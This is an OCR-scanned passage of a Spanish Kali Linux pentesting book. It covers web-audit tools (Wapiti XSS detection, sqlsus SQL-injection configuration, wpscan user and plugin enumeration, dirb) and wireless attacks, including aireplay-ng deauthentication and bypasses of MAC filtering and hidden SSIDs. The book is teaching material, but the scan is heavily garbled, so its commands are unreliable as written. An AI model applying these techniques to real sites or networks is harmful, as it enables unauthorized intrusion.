ета w3af, es una aplicación de código abierto, con la cual es posible auditar y explotar 
lidades web. Consta de cuatro pestañas útiles, las cuales permiten de forma ordenada 
diferentes perfiles de explotación, destacando el perfil OWASP Top Ten por juntar las 
ilidades más comunes, comprobar el estado de los ataques mediante la pestafia de Log y la 


Imagen 05.37: Escáner w3af. 
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Otra forma de automatizar el proceso de pentesting, es posible gracias a la herramienta Wapiti. 
escáner perteneciente a OWASP e incluye la detección de los siguientes ataques web: 


- File Handling Errors (Local y remote include/require, fopen, readfile, etcétera...) _ 
- Database Injection (PHP/JSP/ASP SQL Injections y XPath Injections) 
- XSS (Cross Site Scripting) Injection A 
- LDAP Injection ү 
- Command Execution Detection (eval(), system(), passtru()...) 
- CRLF Injection (HTTP Response Splitting, session fixation...) 
Realizando una prueba simple, con una de las páginas explotadas de forma manual con ante 
en este capítulo, es posible llevar a cabo la detección con Wapiti de un Cross Site Scripting 


тотаКкатт:-# wapiti http://AnünynGus/pruebas/Xss/Xss .php: 
lapiti-1.1.6 (wapiti.sourceforge.net) 


tracking urls (GET) 


ier) іп http://4n8nymGus/pruebas/xss/xss .php 
Evil url: http://4n8nynGus/pruebas/xss/Xss .php?usersescript»varewapiti 6| 
B7474703a21213460306079643875732170727565626173217873732178737320706870 75736572| 
'ew«Boolean() ;«/script» 


tracking forms (POST) 


Imagen 05.38: XSS con Wapiti. 


Explotación de bases de datos р 
La explotación de vulnerabilidades suele ser la fase más suculenta para todo auditor de seguric 
Realizar una extracción de datos satisfactoria sin comprometer el estado del sistema, llega a 
visto en seguridad como todo un arte. Kali Linux ofrece tres herramientas clave para la explotac 
de bases de datos, no obstante otras herramientas más amplias como sq/map, también forman p 
como se mostró en el punto anterior. Estas herramientas son las siguientes: 


- Bbsql 
-  Sqlninja 
- Sglsus 


Para exponer la extracción de información de una base de datos mediante una inyección SQL 
ha elegido la herramienta sq/sus. Esta es una aplicación de código abierto escrita en Perl, la € 
permite diferentes opciones para realizar una explotación. Estas opciones pueden ser la inclus 
de cualquier tipo de consulta manual, la descarga de archivos del servidor con el conocido mé 
load file, e inclusive subir y ejecutar un backdoor mediante métodos como into outfile. Sglsus uti 


fichero de configuración para lanzar los ataques, el fichero es posible crearlo desde la propia 
jenta con la sintaxis sg/sus -g sqlsus.conf desde consola. Editando el fichero, es posible 
ar las modificaciones pertinentes para la correcta configuración de la inyección, tales como la 
ina de ataque, el parámetro vulnerable, los espacios entre querys o inclusive la forma de terminar 
'ecciones para limpiar el posible código sobrante entre el final de la inyección y el incluido 
la página por el desarrollador. 


Start of the url used for the injection 
In inband/union mode, it is generally a good ides to append “AND 0" so that t| 
query retums nothing 
art = "http://localhost/script .php?idel'*; 


End of the url used for the injection 
When possible, it is generally a good idea to use "8" here, so that, our quer: 
won't be polluted by the original one 

Ex : our $url end = “8%; 


Use POST instead of GET 
bur $post = 0; 


Use blind injection ? 
set it to 1 for boolean-basad blind injection 
set it to 2 for time-based blind injection (requires MySQL >= 5.8.12) 


Imagen 05.39: Configuración de зиз. 


ra realizar la carga del fichero, basta con incluir el nombre de la aplicación junto al fichero de 


sqlsus version 0.7.2 
Copyright (c) 2008-2011 Jérémy Ruffet (sativouf) 


^] Session "4nÜnysOus" Loaded 
Imagen 05.40: Carga del fichero de configuración de sqlsus. 


comando s/art, lanza el ataque а la página configurada con el objetivo de identificar el nombre de 
se de datos, su versión, y el usuario con el que se ejecutan las consultas. 


RISUS ETE 
+] UNION columns already set to [0,8,1,0), skipping auto-detéetion... (use "au 
conf select colmns" to do it anyway) 

+] max url length already set to 8193 , skipping auto-detectiom,.. (use "eutoc 
b to do it anyway) 


| poison2 
1" 


B rows in set 


iqisus»- 


Imagen 05.41: Carga del fichero de configuración de sq/sus. 
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Gracias a que la versión de MySQL 5, incluye las tablas de la base de datos information. 
es posible aplicar el comando ger. Sqlsus incorpora opciones de extracción de informacii 
comando, el cual es realmente simple de combinar para diferentes usos. 


A continuación se muestra la extracción de las tablas de la base de datos con ger tables. 


qIsus» get tables 
*] Getting tables names 


{ poison2 )» 


гана) 
[alertscontig] 
[datadonains] 
[ddos] 
[domains] 
[forms] 

[1р2] 
[payloads] 
[zombies] 


[users] 
user 


Imagen 05.42: Extracción de tablas con sg/sus. 


Identificación de CMS 


Dentro de este apartado, se muestran tres herramientas con funcionalidades muy dirigidas 
CMS en común, WordPress. Sin duda este CMS ha aumentado su popularidad hasta llegar al p 
puesto entre los más utilizados. Es por esta cuestión, por la que se incrementó también el nün 
ataques disponibles en Internet y el forzado aumento de herramientas de auditoría de seguridad, 
obstante, también es posible realizar ataques a otros sistemas conocidos como phpbb, oscomen 
phpnuke. Estas tres herramientas se tratan de BlindElephant, plecost y wpscan. р 


La herramienta BlindElephant, utiliza una sentencia simple para identificar versiones de di! 
tipos de CMS. El siguiente ejemplo muestra como introduciendo en consola Python BlindEleph 
py dominio.com Movabletype. se realiza un Fingerprinting descubriendo la versión que se encue 
detrás de este sistema. 


ЛИНИН .сол/тт -static/nt.]s 
bla varsions based on result: 3.35-en, 3.36-@0, 3.37-en, 3.38-ел 


p .con/nt -static/js/tc/client 
JS versions based on result: 3.35.an, 3.36 07, 8137-00, 


|t. http :/ /ШШЕШЕШШШЕЯНИ .сот/тоо1з/ run -periodic-tasks. 
produced no match. Error: Failed to reach a server: Not Found 


It http: / [MMS .com/mt -stetic/css/! 
produced no match. Error: Failed to 


printing resulted їл: 


3,38-0n 


Imagen 05.43: Extracción de versión de Movablerype. 


ienta wpscan escrita en Ruby, es un escáner íntegramente orientado a la realización de 
as de seguridad en WordPress. Esta aplicación tiene como funcionalidades destacadas, el 
ir el listado de plugins instalados, además de un reporte de vulnerabilidades en versiones o 
sive el conocido fallo de enumeración de usuarios. La siguiente imagen muestra esto último 
nte la sintaxis wpscan —url dominio.com —enumerate и. 

пите гетіпд usernames ... 


+] We found the following 8 usemname/: 


iiiiiiii 


i 
i 
" 
E 
E 
E 
E 
E 


+] Finished at Thu Apr 
+] Elapsed time: 89:9019, 
ootükali:-d 


Imagen 05.44: Extracción de usuarios en WordPress. 


muestra información según la versión de WordPress, consultando la existencia de 


Imagen 05.45: Extracción de versión y vulnerabilidades públicas. 


Una de las grandes ventajas de wpscan, es la velocidad para llevar a cabo las comprobaciones, a 
que el listado de plugins existentes, es recorrido en cuestión de segundos desde su dicci . 
la sintaxis wpscan —url dominio.com —enumerate p, es posible realizar esta acción. 


king for 2380 total plugins... 190% completa. 


+] Wa found 3 plugins: 
| Nano: sidebartabs Da p 
| Location: Мїтр:/, 


| Name: sitopress-multilingual -cas 
| Location: оо соседи гуа top rees 13 Lirquet е кө/ 


| Name: superslider-nenu 


| Location: http: ИИИНИН / e -content/plugins/supersl1der-menu/ 
Imagen 05.46: Enumeración de plugins instalados. 


Identificación de IDS/IPS 


En este apartado Kali Linux incluye tan solo una herramienta, la cual permite al auditor i 
diferentes páginas web detrás del mismo dominio, dependiendo del tipo de user agent con 
este solicite las peticiones. Por defecto este script en Python, incluye un diccionario con 
realizar las comprobaciones. 


La sintaxis en consola para realizar la identificación es ua-tester -u http://dominio.com 


(1 URL (ENTERED): https://wew.vordpress con 
{| URL (FINAL): nttp://wordoress.com/ 
| Response Code: 381 Moved Permanently 


nginx 
1 Date: Thu, 11 Apr 2013 14:55:40 GMT. 
1 Content-Type; text/html; charset=utf-8 
] Transfer-Encoding: chunked 
a M е 
1 Vary: Accept -Encod! 
1 
] Sa 
1 


Сокі. 
с -Соок -2013 14:55:40 GMT 
Bata (05): 5375977950 


Imagen 05.47: User Agent Mozilla/S.0. 


agents: 
- (M)obile 
- (Desktop 
- mis(C) 
- (T)ools 
- (Bots 
- e(X)treme 


tulo V. Auditoría de aplicaciones Web 


que sería posible discriminar y realizar la siguiente orden: ua-tester -u http://dominio.com 


[o user-agent String у MorITTa/2.8 (cospalible; Ask Тоат 


UI) Vary: Cookie 


[ >! user-agent String : sertet-ProdactR/1.8 (enttp://000rEN man. сдайщгөо! Na) 


1) Very: Cookie 
>] User-Agent String : өсте, 


VD. Very: Cookie 


Imagen 05.48: Selección de grupos. 


exadores web 

e los puntos más importantes frente a una auditoría web, es realizar un listado de forma 
iva de todos aquellos ficheros y directorios que forman la página a auditar. En este proceso se 
n tanto métodos activos como pasivos, con el objetivo de indexar todas las rutas posibles. Kali 
incluye multitud de herramientas con este fin, con lo que cabe la posibilidad de reutilizar las 
асіопеѕ pertenecientes a la sección de proxys inversos, como Burp Suite, Vega o WebScarab 
s. La aplicación WebScarab incluye una herramienta Spider, la cual permite de forma 
capturar los dominios que pasan a través de su Proxy y visualizarlos en forma de árbol. 


* GJ language tools 
+ Gi preferences 
LED 


Imagen 05.49: Captura de dominios con WebScarab. 


| 166 | Pentesting con K 


Una de las herramientas no comentadas cen anterioridad y que pueden llegar a facilitar este tr 
es dirb. Esta aplicación incluye la opción de utilizar dii 


ionarios para complementar la tai 
indexaci 


n mediante fuzzing. 


BTART TIME: Thu Apr 4 08:22:17 2813 

RL BASE: http://www. enelpc .com/ 

ORDLIST FILES: /usr/share/dirb/wordlists/small .txt 
DPTION: Not Stoping on warning messages. 


ENERATED WORDS: 957 


++- Scanning URL: http://wew.anelpc.com/ --- 
http://www enel pc .con/1098 

(FOUND: 588 [Internal Server Error] - Size: 4532) 
http://www analpe ,con/2088 

(FOUND: 200 [Ok] - Size: 87329) 
http://www .analpe .com/2001 


(FOUND: 208 [Ok] - Size: 8733 
http://wew.anel pc .com/2002 
(FOUND: 280 [0k] - Size: 873: 


http://www anal pc .com/2003 

(FOUND: 208 [Ok] - Size: 87329) 
http://www. ünglpc ,con/2084 

(FOUND: 200 [Ok] - Size: 87331) 
http://www. nel pc .con/2005 

(FOUND: 200 [Ok] - Size: 87329) 
> Testing: http://www.enel pc .com/contents 


Imagen 05.50: Rutas existentes con dirb. 


La opción gráfica a dirb, es otra herramienta similar llamada dirbuster, también incorporada 
de Kali Linux. 


Otra herramienta interesante es cutycapt, la cual permite realizar capturas de pantalla eligi 
mediante modificadores, qué tipo de elementos web habilitar o no. Puede ser una herrami 
imprescindible a la hora de visualizar una página, que contenga ejecución de código Ja 

exploits en complementos o posible malware. Con la siguiente sintaxis es posible realizar la сар 
de una página omitiendo la ejecución de código JavaScript: 1 


Cutycapt —url-http://www.tuenti.com/ --out-localfile.png -JavaScript—off. 


La sesión ha caducado. Te redirigiremos a la página de acceso... 
Siro ves la рауга de acceso en 5 segundos, Pincha aquí 


Imagen 05.51: Cutycapt con JavaScript deshabilitado. 


apitulo V. Auditoría de aplicaciones Web 


)nclusiones х 

Linux ofrece un gran abanico de posibilidades incorporando un número extenso de utilidades 
idas, evitando al auditor perder el tiempo de búsqueda, descarga, instalación y configuración 
mismas. 


п esta distribución, es posible hacer de la auditoría un campo de acción ilimitado para el auditor, 
¿como se ha querido demostrar en este capítulo, es posible tanto valerse de herramientas que 
jan a nivel de cabeceras que componen una petición HTTP, como de aplicaciones automatizadas 
п apenas configuración, son capaces de realizar explotaciones de vulnerabilidades de forma 
oria. No obstante, es recomendable abrir ese abanico de posibilidades de forma personal, 
ndo aplicaciones no incluidas en la suite o que simplemente trabajen sobre otros sistemas 


ipítulo VI. Ataques Wireless 


Capítulo VI 
Ataques Wireless 


Tipos de ataques inalámbricos 


а s de tipo inalámbrico siempre han llamado la atención del gran público. Cualquier 
jo del mundo de la informática ha intentado llevar a cabo un ataque de este tipo, sobre todo a 
ologías Wireless. Un simple ejemplo de esto podría ser cuando un usuario con pocas nociones 
iridad, o incluso con pocas nociones técnicas informáticas, intenta crackear la contraseña de 
red Wireless para obtener acceso a Internet. 


calmente interesante de cualquier vector de ataque, aparte de conocerlo, es saber cómo funciona 
п las herramientas que se utilizan realizan las acciones para explotar los fallos de configuración, 
de seguridad o el propio fallo de la tecnología. 


а distribución de Kali Linux existen diversos tipos de ataques inalámbricos. Como puede ser 

nal los más conocidos son los ataques Wireless, pero no son los únicos. Este capítulo se centrará 

ataques Wireless, pero antes de ello se pretende enumerar los distintos tipos de ataques y las 
les que realizan estos. 


logía Bluetooth es una especificación para redes inalámbricas de área personal (WPAN). 
is redes posibilitan la transmisión de voz y datos entre diferentes dispositivos gracias a un enlace 
diofrecuencia en la banda de los 2,4 GHz. Los objetivos de esta tecnología son: 


- Eliminar los dispositivos atados, es decir, cables y conectores. 

- Facilidad en las cómunicaciones entre dispositivos móviles y fijos. 
© * Creación de pequeñas redes inalámbricas. 

~ Sincronización de datos entre dispositivos. 


п día es muy común que los dispositivos que utilizan esta tecnología pertenezcan a dispositivos 
como smartphones, móviles, PDAs, portátiles, cámaras, impresoras, etcétera. 


ali Linux se incluyen las siguientes herramientas para realizar pentesting a dispositivos con 
Oth: 


- BTScanner. Esta herramienta permite extraer información de cualquier di 
Bluetooth que se encuentre habilitado. Se basa en la pila de B/ueZ que viene con 
de Linux. 

- Bluelog. Esta herramienta comenzó siendo un escáner pequeño y de fácil int 
podía entender como otro escáner sencillo para detectar dispositivos con Blueto 
pero evolucionó y también permite monitorizar tráfico Bluetooth. 

- Bluemaho. Esta herramienta proporciona una shell-GUL para realizar 
escaneo de dispositivos Bluetooth, así cómo ejecutar exploits de vulnerabilidades 
en el protocolo, configurar el dispositivo, almacenar resultados en una base de datos, 
Una herramienta bastante interesante para testear B/uetooth. 
- Blueranger. Es un script en bash el cual permite localizar dispositivos de | 
Bluetooth mediante la utilización de pings para la creación de una conexión 
interfaces Bluetooth. 

- Fang. También conocida como redfang, es una herramienta que permit 
dispositivos Bluetooth ocultos. 
- Spoofiooph. Esta aplicación permite automatizar el proceso de suplantación о © 
de dispositivos Bluetooth. ha 


La tecnología RFID, Radio Frecuency Identification, es un sistema de recuperación y alm 
de datos remoto que es utilizado por etiquetas, tarjetas, tags RFID, Existen distintas c 
Kali Linux para estas aplicaciones y en cada una de ellas hay numerosas herramient 
fines. Dichas categorías son las siguientes: 

- RFIDiot ACG. 

- RFIDiot FROSCH. 

- RFIDiot PCSC. 


La tecnología NFC, Near Field Communication, permite las comunicaciones inalámbri 
alcance y frecuencia alta. Se puede realizar intercambio de datos entre dispositivos. Las hi 
para NFC son las siguientes: 

- Mfcuk. 

- Mfoc. 

- Mifare-classic-format. 

-  Nfc-list. 

- Nfe-mfelassic, 
Por ültimo, se hablará de las herramientas de Wireless дие ве incluyen en Kali Linux. Ad 


resto del capítulo se detallarán pruebas de concepto del uso de las herramientas más intet 
la realización de auditorías Wireless. 
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apartado se explicarán ciertas definiciones importantes para el desarrollo del capítulo, y que 
ser conocidas por los usuarios o pentesters. 


їп nombre incluido en todos los paquetes de una red inalámbrica para identificarlos como 
esa red. El código consiste en un máximo de 32 caracteres que la mayoría de las veces 
fanuméricos. Todos los dispositivos inalámbricos que intentan comunicarse entre sí deben 
el mismo SSID. 


CIP, AES, ЕАР 
- PSK, PreShared Key, es una clave compartida entre un punto de acceso y un cliente. Son 
vulnerables a más acciones, sobre todo a ataques de diccionario. 
=- TKIP, Temporal Key Integrity Protocol, es un algoritmo de cifrado de datos utilizado en 
WPA. 
= AES, Advanced Encryption Standard, es un algoritmo de cifrado de datos utilizado en 
 WPA2. 
- ЕАР, Extensible Authentication Protocol, protocolo para el intercambio de mensajes 
durante el proceso de autenticación. 


lerramientas Wireless en Kali 
mientas Wireless disponibles en Kali Linux son las siguientes: 


Suite air*. Las numerosas herramientas del prefijo air como son aircrack, aireplay, airmon, 
airdecap, airbase, etcétera. Estas herramientas permiten cambiar el modo de trabajo del 
adaptador inalámbrico, reinyectar paquetes, desautenticar clientes con el punto de acceso, 
descifrar tráfico, configurar puntos de acceso y numerosas funciones más. 

Asleap. Es una herramienta diseñada para crackear contraseñas de los protocolos LEAP y 
PPTP. Esta aplicación puede realizar la recuperación de las contraseñas sobre capturas en 
vivo o en archivos PCAP. Además, puede llevar a cabo la desautenticación de clientes en un 
adaptador WLAN. Su funcionalidad más utilizada es la de la recuperación de contraseñas 
.. PPTP en VPN. Ў 

* . Cowpatty. Esta aplicación permite realizar fuerza bruta o ataques de diccionario sobre el 
protocolo WPA y WPA2. 


Eapmd5pass. Esta herramienta permite realizar un ataque de diccionario contra EA 
Se necesita una captura con la autenticación en un formato PCAP, bastante típico ci 
se audita Wireless. 

-  Fern-wifi-cracker. Permite auditar y recuperar las claves WEP/WPA/WPS y ej e 
ataques basados en Wireless o ethernet, Proporciona una GUI muy intuitiva para Ii 
cabo el proceso de auditoría. Una herramienta muy interesante que facilita mucho el 
básico de auditoría Wireless. 

-  Genkeys. Generador de claves para asleap. 

-  Genpmk. Esta herramienta es utilizada para crear archivos con hashes de manera 
а como se realiza en una rainbow table. En WPA el SSID es utilizado en el salt para T 
el hash, por lo que es algo que hay que tener en cuenta. Hay que crear un fichero рог 
SSID. 

- dGiskismet. Esta herramienta permite realizar búsquedas e inserciones en ficheros 
puede utilizar para crear una base de datos con información geográfica de puntos de ас 
abiertos y mostrarlos en un mapa. 

- Kismet. Esta aplicación es un sniffer, detector de redes Wireless que trabaja en capa › 
protocolo 802.11. Kismet trabaja con cualquier tarjeta que soporte modo monitor y рі 
sniffar tráfico de tipo 802.11b, 802.11a, 802.11g y 802.11n. 1 

-  Mdk3. Esta herramienta permite jugar con el SSID de los puntos de acceso, 
provocando la desautenticación de los clientes legítimos de un punto de acceso. О 
sus funcionalidades es la de realizar fuerza bruta contra el nombre de la red W 
Además, permite crear un número alto de SSID, gracias a los beacons, falsos cuya 
es molestar a los usuarios legítimos. 

-  Mifite. Esta aplicación permite auditar redes Wireless de manera sencilla e intu 
gracias a su menú principal. La aplicación es de terminal, pero su menú mediante 
deja bastante claro qué acciones se pueden realizar. Por debajo utiliza las hei 
típicas, pero gracias a su presentación no se necesita tener conocimientos de lo que sé 
llevando a cabo. Recomendable su uso en casos particulares, ya que simplifica 
configuración de las herramientas. 

- Reaver. Esta aplicación permite realizar un ataque de fuerza brutal contra WPS, 
Protected Setup. La aplicación realiza el ataque contra el PIN de WPS, consig 
recuperar el passphrase de WPA/WPA2. 

- Herramientas de prefijo zb como pueden ser por ejemplo zbstumbler, zbdsniff, zb 

etcétera. 


Requisitos 


El mayor de los requisitos es que el chipset del adaptador Wireless debe poder config 
modo monitor. Es importante no confundir el modo monitor con el modo promiscuo de la tarj 
inalámbrica. 
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modo monitor captura todo el tráfico que circule en el radio de acción del adaptador, 
idependientemente de la red por la que viaje. Se puede entender como que el modo monitor captura 
o el tráfico del aire. El modo promiscuo se configura cuando el adaptador se encuentra asociado 
una red Wireless y se captura todo el tráfico de dicha red. 


ten ciertos sitios web que comunican al usuario la compatibilidad de su chipset con el modo 
nitor del adaptador inalámbrico. Por ejemplo, la siguiente URL Attp://linux-wless.passys.nl 
una serie de preguntas para poder verificar la compatibilidad del chipset con el modo 


га suite air* 

a suite de herramientas air proporciona todo lo necesario para llevar a cabo una auditoría a redes 
less en Kali. Existen otras herramientas, como son GUIs o scripts, que utilizan por debajo a las 
jas herramientas de la suite. A continuación se presenta un listado detallado de las herramientas 


- Airmon-ng. Cambia el modo de trabajo de la tarjeta inalámbrica, siempre y cuando el 
chipset lo permita, El modo de trabajo pasa a ser de tipo monitor. 

- Airodump-ng. Esta aplicación escucha o sniffa todo lo que circula por el aire, 
independientemente de su cifrado, su red, etcétera. Lógicamente si el tráfico va sin cifrar, 
es decir redes abiertas, se puede visualizar dicho tráfico y se podría capturar información 
sensible que circula por el medio de transmisión, el aire. Más adelante se detalla el uso de la 
aplicación. 

- Alirbase-ng. Esta herramienta permite a un usuario atacar a los clientes asociados а 
un punto de acceso. Es una aplicación versátil y flexible, disponiendo de distintos modos 
de trabajo. Otra opción interesante que aporta airbase-ng es la de habilitar el adaptador 
inalámbrico como si fuera un punto de acceso normal. De este modo, se podría engafiar a un 
usuario para que se conectase al punto de acceso falso y capturar de manera sencilla todo su 
tráfico. 

- Aircrack-ng. Esta herramienta permite realizar ataques de fuerza bruta, diccionario о 
estadísticos a capturas de tráfico Wireless. En función del tipo de cifrado de la red que se 
quiera crackear se realizará un tipo de ataque и otro, 

-  Airdecap-ng. Permite descifrar capturas de cifrado МЕР y WPA, siempre y cuando se 
disponga de la clave de la red. El resultado de la operación es un fichero CAP con el tráfico 
que estaba protegido por el cifrado totalmente visible y accesible. 

-  Airdecloak-ng. Esta herramienta permite al usuario eliminar los paquetes de МЕР 
cloacking de la captura de tráfico obtenida. Algunos puntos de acceso insertan frames WEP 
falsos para contaminar las posibles capturas de tráfico y que el ataque estadístico no funcione 
correctamente. Interesante herramienta si se observa que se tarda demasiado en crackear 
WEP. 


Pentesting со Р 


- Airdriver-ng. Esta herramienta proporciona información sobre los drivers del si 
lo que a Wireless se refiere. Además, proporciona la posibilidad de cargar drivers e in 
desinstalar éstos con los parches necesarios para los modos monitor e inyección. 

- Aireplay-ng. Permite realizar operaciones o ataques sobre los puntos de acceso y el 
asociados a éstos. Más adelante se detallan las posibilidades de esta aplicación que rea 
funciones de navaja suiza en los ataques Wireless. 

- Airolib-ng. Esta herramienta permite almacenar y manejar listas de ESSID y cont " 
calcular las PMKs, Pairwise Master Keys'y usarlas para crackear WPA/WPA2. La apli 
utiliza una base de datos de poco peso, como es SQLite3. Crackear WPA/WPA2 
calcular la PMK que se deriva de la PTK, Private Transient Key. El cálculo de la P 
un proceso lento ya que utiliza PBKDF2 como algoritmo, pero la PMK es siempre la. 
para un ESSID y contraseña concreta, es decir, se puede pre calcular la PMK para cons 
ciertas combinaciones y acelerar la obtención de la clave WPA/WPA2. La experi 
que se pueden comprobar más de 30.000 contraseñas por segundo con este método. — ^ 
- Airserv-ng. Es un servidor para tarjetas Wireless, el cual permite múltiples aplicacion 
usar aplicaciones independientemente de la tarjeta o driver. Todos los drivers se e 
incorporados en el servidor por lo que se elimina la necesidad de que cada aplicación c 
datos y drivers. Cuando un usuario utilice la suite aircrack, en lugar de especificar la int 
se especificará la dirección IP del servidor y el puerto de éste. 

- Airtun-ng. Esta herramienta permite crear interfaces virtuales denominadas fu 
interface. Sus funciones principales son la monitorización de tráfico cifrado con pro 
de WIDS, Wireless Intrusion Detection System, y la de inyectar tráfico de forma arbi 
una red. 


Airodump-ng 
Es una de las herramientas estrellas de la suite y más conocidas. Permite al usuario escuchar 
tráfico que circula por el aire, ayudándose de la interfaz inalámbrica trabajando en modo mí 


En este apartado se detallan los parámetros que se pueden visualizar en una captura de tráf 
con airodump-ng, ya que se entiende que puede ser costoso para un usuario interpretar tod 
información que la aplicación muestra por pantalla. 


2 
> 
p 


d: 36 s ]( 2012-09-13 15:16 


BSSID PWR Beacons MB ENC CIPHER AUTH ESSID 
өө TA -39 12 54е. МЕР МЕР 

00: 97 -39 9 54e. МРА2 CCMP PSK 

өө: Ae -52 14 54e. WPA2 ССР PSK 

эс: 94 -65 12 54e. WPA2 ССР PSK 

30: Bl -69 10 54е WPA2 CCMP PSK 

5c 94 -72 15 54e. WPA2 CCHP PSK 

0 83 -75 4 54е МРА2 CCMP PSK 


Imagen 06.01: Captura de tráfico con airodump-ng (Parte 1). 


Capitulo VI. Ataques Wireless B К 


Captura de tráfico con airodump-ng (Parte 2). 


in la siguiente tabla se resumen los parámetros que se pueden visualizar en la imagen de airodump- 
g. Es importante entender el funcionamiento y el significado de todos los detalles que proporciona 
iplicación. 


Parámetro Descripción 
Identifica la dirección MAC de un punto de acceso. 


Intensidad de la señal. El significado depende del controlador, en algunos modelos 
cuanto más cerca del 0 mayor nivel y en otros cuanto más cerca del 100 mejor nivel 
de señal. 


Número de balizas o paquetes anuncio enviados por el AP. 

Número de paquetes de datos. En WEP solo cuentan los IVS. 

Número de paquetes de datos por segundo. 

Canal. 

Velocidad mínima soportada por el AP. 

Algoritmo de cifrado en uso por el AP. Puede ser OPN, WEP, WPA o WPA2. 
Tipo de cifrado de datos. Puede ser WEP, TKIP (WPA) o CCMP (WPA2). 


Método de autenticación. Generalmente suele visualizarse PSK en entornos de 
clave compartida. 


Nombre de la red Wireless. 
Dirección MAC de un cliente asociado a un AP. 


Son paquetes en los que un cliente intenta identificar una red Wireless. Por lo que 
se puede obtener el nombre de redes que un cliente está buscando e intenta verificar 
que se encuentran en su radio de acción. 


Т Tabla 06.01: Resumen y descripción de los parámetros que se pueden visualizar en la imagen de airodump-ng. 


—] 


eplay-ng 

mienta permite realizar diversos ataques sobre puntos de acceso y clientes asociados. Es 
cida como una navaja suiza por su diversidad en los ataques tal y como se puede visualizar en 
lagen correspondiente. 


: deauthenticate 1 or all stations (-0) 
: fake authentication with AP (-1) 
: interactive frame ction (-2) 
(tandard ARP-request replay (+3) 
decrypt/chopchop WEP packet (-4) 


*- fragment : generates valid keystream (-5) 
--caffe-latte : query a client for new Туз (-6) 
--cfrag : H client 
--migmode on mode 
-test : tests injection а ¡ers (-9) 


--help : Displays this usage screen 


Imagen 06.02: Opciones de aireplay-ng. 


Muchos usuarios ven en el uso de esta aplicación una dificultad que no es real, ya que si se 
de los conocimientos sobre lo que es cada ataque, el uso de la aplicación es bastante s 
la siguiente tabla se pueden visualizar los distintos tipos de opciones o ataques que рге 
aplicación. 


Ataque Descripción 
Este ataque permite al atacante desautenticar a uno o varios clit 
de un punto de acceso. 
Este ataque permite asociarse а un punto de acceso, siei [ 
cuando el AP lo permita. 


-0 Desautenticación 


-1 Autenticación falsa 


Este ataque permite elegir un paquete y reenviarlo. 
mejores resultados que el ataque 3. 
Este ataque permite capturar un paquete ARP y reinyectarlo co 
el AP, generando gran volumen de tráfico. $ 


-2 Selección interactiva 


-3 Reinyección de paquetes 


Este ataque no recupera la clave WEP en sí misma, sino que 


4: Aliaga ChopChop, meramente el texto plano, 
-5 Fragmentación Este ataque intenta generar una keystream. 
-6 Caffe-Latte i үте asociados serán quienes aporten más 1Vs рага cra 


Tabla 06.02: Resumen y descripción de los tipos de ataques en aireplay. 


Evasión de configuraciones básicas de seguridad 
Existen configuraciones muy básicas de seguridad para los puntos de acceso. En muchos án 
un sector de los profesionales de la seguridad, no se consideran configuraciones de seguri 
sí aportan una pequeña capa, la cual habría que evadir, Por esta razón, en el instante que hay 
evadir una capa de seguridad, por muy pequeña que sea, se está hablando de configuración bá 
seguridad. A continuación se enumeran las tres configuraciones básicas de seguridad: 
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- Filtrado de direcciones MAC. 
- DHCP desactivado o erróneo. 
- SSID Oculto. 


filtrado de direcciones MAC permite autenticarse en la red sólo con un conjunto de direcciones 
[AC válido. Para saltar esta protección, sencillamente habrá que realizar MAC Spoofing, es decir, 
ar la dirección MAC de un cliente que tenga acceso a la red. El proceso se puede ejemplificar 
la siguiente manera: 

- Соп la herramienta airodump-ng y el adaptador en modo monitor se pueden visualizar los 
clientes asociados a un punto de acceso. 

- Sino hay un cliente asociado al punto de acceso, se deberá esperar a que esta situación 
se concrete, 

- Una vez que se dispone de una dirección MAC válida, se debe cambiar mediante el uso 
de la herramienta macchanger. 

- Se ha conseguido realizar un Bypass del filtrado de direcciones MAC en un punto de 
acceso. 


restricción DHCP puede entenderse de varias maneras. La primera es que el servidor DHCP 
red Wireless a la que se accede no aporta direcciones IP de manera dinámica. La segunda es 
el servidor DHCP distribuye un rango de red erróneo, ¿Con qué fin? Confundir al intruso y no 
guir conectividad con máquinas de la WLAN, ni salida a Internet. 


€l servidor DHCP se encuentra deshabilitado saltarse la restricción es tan sencillo como configurar 
'cción IP, DNS y puerta de enlace manualmente. ¿Cómo sabemos el rango de la red? Si existe 
cliente asociado a la red se coloca un sniffer, o incluso con airodump-ng, y se captura el tráfico 

red obteniendo la dirección IP del cliente asociado. Si no existe un cliente asociado a la red, se 
iría hacer un escaneo ARP a rangos de red locales para ver al router y encontrar el posible rango. 
ra posibilidad es esperar a que los paquetes multicast aparezcan, que seguro que ocurre, y obtener 
a dirección IP válida. 


el servidor DHCP reparte direcciones IP falsas, es decir, de un rango erróneo al de la red, el 
irio notará que no encuentra equipos en ese segmento ni puede navegar a través de Internet. Se 
dría utilizar el procedimiento descrito para cuando el servidor DHCP se encuentra deshabilitado, 
le esta forma obtener el rango correcto. 


tricción del SSID consiste en ocultar el nombre de la red, lo cual provoca que un cliente deba 
ir el nombre de la red inalámbrica a la que se quiere conectar. Existen varias posibilidades 
obtener el SSID de la red, si existe un cliente asociado a la red Wireless, se puede provocar 

d ше aireplay-ng la desautenticación del punto de acceso y conseguir que el cliente se vuelva a 
enviando un paquete Probe con el nombre de la red. Si no existe ningún cliente asociado 

Ito de acceso se deberá esperar a que se autentique un cliente, o bien, realizar fuerza bruta con 


la aplicación mdk3. Para nombres de red menores de 5 o 6 caracteres la fuerza bruta puede 
solución, para nombres de mayor longitud no es una buena opción. 


Proof Of Concept: Bypass MAC + Bypass DHCP + SSID Oculto 
En esta prueba de concepto se presenta el siguiente escenario: 


- Un punto de acceso que tiene configurado el acceso solo para clientes con direccii 
CA:FE:CA:FE:CA:FE y 00:1C:BF:4D:0B:BO. 
- Un punto de acceso con DHCP deshabilitado. 
- EISSID de la red oculto. 

- Uncliente asociado a la red. 


- El atacante dispone de la contraseña de la red Wireless o ésta se encuentra abie 
decir, sin cifrado en el tráfico de paquetes por el medio de transmisión. 


D 
¿Cómo evadir estas restricciones? Como se verá a continuación, con Kali Linux, y otras m 
distribuciones de seguridad, es realmente sencillo evadir estas medidas básicas de seguridad Й 


En primer lugar se debe configurar la tarjeta en modo monitor mediante la instrucción ай 
start «interfaz wlan>. Una vez hecho esto la tarjeta podrá escuchar todo lo que circule рог! 


Con airodump-ng se puede visualizar el estado aéreo alrededor del equipo. En la imagen se v 
como existe una red con SSID oculto, de longitud 4, la cual tiene asociado un equipo client 
a éste se podrá obtener el nombre de la red real, para ello se ejecuta el ataque de desauí 
aireplay-ng -0 5 —a «dirección MAC AP» -c «dirección MAC cliente» mon0. 
CH 6 ][ Elapsed: 8 s ][ 2013-04-83 12:30 
